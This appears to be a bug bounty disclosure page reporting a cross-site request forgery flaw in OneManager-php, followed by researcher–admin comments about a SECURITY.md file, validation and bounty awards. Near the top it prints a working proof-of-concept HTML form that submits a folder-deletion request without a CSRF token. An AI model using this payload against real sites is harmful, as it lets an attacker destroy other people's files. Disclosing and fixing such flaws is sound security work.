Cross-Site Request Forgery (CSRF) in qkqpttgf/onemanager-php

Valid

Reported on

Aug 28th 2021


✍️ Description

Attacker able to delete any folder with CSRF attack

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://lackadaisical-tested-garment.glitch.me/" method="POST">
      <input type="hidden" name="delete&#95;sid" value="1" />
      <input type="hidden" name="delete&#95;fileid" value="" />
      <input type="hidden" name="delete&#95;name" value="fd" />
      <input type="hidden" name="operate&#95;action" value="Submit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

As you can see there is no CSRF token.

amammad
3 months ago

Researcher


@admin any feedback from maintainers?

I talk with maintainer on telegram and he is waiting for the auth link.

amammad
3 months ago

Researcher


@admin this is a message from maintainer i dont like left a log in master branch,can i create a new branch to do this?

Jamie Slome
3 months ago

Admin


@amammad - I am not too sure what this means?

amammad
3 months ago

Researcher


@admin ah so sorry about that, maintainer already create a SECURITY.md on a huntr.dev branch

https://github.com/qkqpttgf/OneManager-php/tree/huntr.dev

because of personal reasons

Jamie Slome
3 months ago

Admin


No worries, they just need to make sure this is merged into their main branch for us to automatically contact them.

amammad
3 months ago

Researcher


@admin

They don't want to add SECURITY.md to their main branch for personal reasons. please make an exception for me and maintainer.

amammad
3 months ago

Researcher


@admin Also he put own telegram id on SECURITY.md file not own email.

amammad modified their report
2 months ago
qkqpttgf validated this vulnerability 2 months ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
qkqpttgf confirmed that a fix has been merged on 920501 2 months ago
qkqpttgf has been awarded the fix bounty